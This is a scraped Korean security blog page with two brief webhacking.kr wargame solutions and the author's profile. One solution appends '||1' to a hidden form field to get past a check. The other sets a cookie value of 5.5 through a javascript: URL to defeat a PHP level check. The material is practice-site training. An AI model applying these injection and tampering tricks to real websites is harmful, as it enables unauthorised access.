gogo







크롬 개발자 도구

<form method="post" action="index.php"><input type="hidden" name="answer" value="1010100000011100101011111">name : <input type="text" name="id" maxlength="10" size="10"><input type="submit" value="write"></form>


히든 필드 벨류값에 ||1 추가 후 전송




name : admin
answer : xxx_xxx_xxxxxxxxx
ip : localhost



Clear.

'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27

<?

$password
="????";

if(
eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if(
$_COOKIE[user_lv]>=6$_COOKIE[user_lv]=1;

if(
$_COOKIE[user_lv]>5) @solve();

echo(
"<br>level : $_COOKIE[user_lv]");

?>


javascript:alert(document.cookie="user_lv=5.5")



Clear.


'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27
Profile Profile 2014.06.27 01:42

Profile

닉네임 : ReverserHW

나이 : 21살

소속 : 중원대학교 컴퓨터시스템공학과, TenDollar(10$)





- 활동내역 -

2012~

정보보호 올림피아드 본선 진출

2013~

화이트햇 본선 진출(With CodeBlack)

2014~

해킹/보안 입문자들을 위한 가이드 문서 작성 및 배포

2015~

중원대학교 학술제 장려상 (종합미니게임, 플래시 라이트)

중원대학교 APP 동아리 플래시 라이트 (플레이스토어 등록)

'Profile' 카테고리의 다른 글

Profile  (0) 2014.06.27